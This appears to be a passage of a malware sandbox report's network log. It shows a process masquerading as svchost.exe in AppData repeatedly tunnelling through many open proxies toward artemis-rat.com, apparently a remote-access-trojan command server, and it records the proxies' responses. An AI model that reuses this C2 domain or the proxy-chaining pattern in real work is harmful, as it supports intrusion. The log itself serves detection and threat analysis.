Mar 9, 2024 13:14:28.541810036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.696079969 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2022	192.168.2.5	56231	60.246.122.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.558490038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2023	192.168.2.5	56211	139.198.120.15	29527	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.559644938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.380067110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2024	192.168.2.5	56380	185.162.228.170	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.559650898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.717154026 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2025	192.168.2.5	56222	128.199.221.91	50223	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.567362070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.248486996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2026	192.168.2.5	56249	116.203.28.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.569412947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.223689079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.888257027 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2027	192.168.2.5	56252	147.75.34.86	10010	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.572278023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.885442019 CET	65	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Zscaler/6.3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2028	192.168.2.5	56610	43.153.71.58	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.572551966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2029	192.168.2.5	56620	43.153.71.58	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.574327946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2030	192.168.2.5	56624	43.153.71.58	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.575793028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2031	192.168.2.5	56232	54.233.119.172	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.575836897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.906328917 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2032	192.168.2.5	56627	43.153.71.58	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.576536894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2033	192.168.2.5	56158	119.3.215.41	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.581795931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.380240917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.735241890 CET	741	IN	HTTP/1.1 500 Internal Server Error Server: nginx/1.16.1 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 579 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.16.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2034	192.168.2.5	56230	88.210.20.144	20000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.585078955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.070703030 CET	202	IN	HTTP/1.0 404 Not Found Content-Length: 717 Content-Type: text/html Date: Sun, 28 Jan 2024 21:35:32 GMT Expires: Sun, 28 Jan 2024 21:35:32 GMT Server: Mikrotik HttpProxy Proxy-Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2035	192.168.2.5	56210	49.228.131.169	5000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.589306116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2036	192.168.2.5	56427	1.0.0.13	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.589449883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.746929884 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2037	192.168.2.5	56429	104.25.42.178	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.591007948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.745553970 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2038	192.168.2.5	56294	89.38.99.29	20551	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.597059965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.891771078 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2039	192.168.2.5	56264	43.131.242.162	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.610431910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2040	192.168.2.5	56362	94.131.60.206	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.610847950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.833271027 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2041	192.168.2.5	56267	20.24.43.214	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.610934019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.940367937 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2042	192.168.2.5	56443	172.67.181.20	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.616003036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.770617962 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

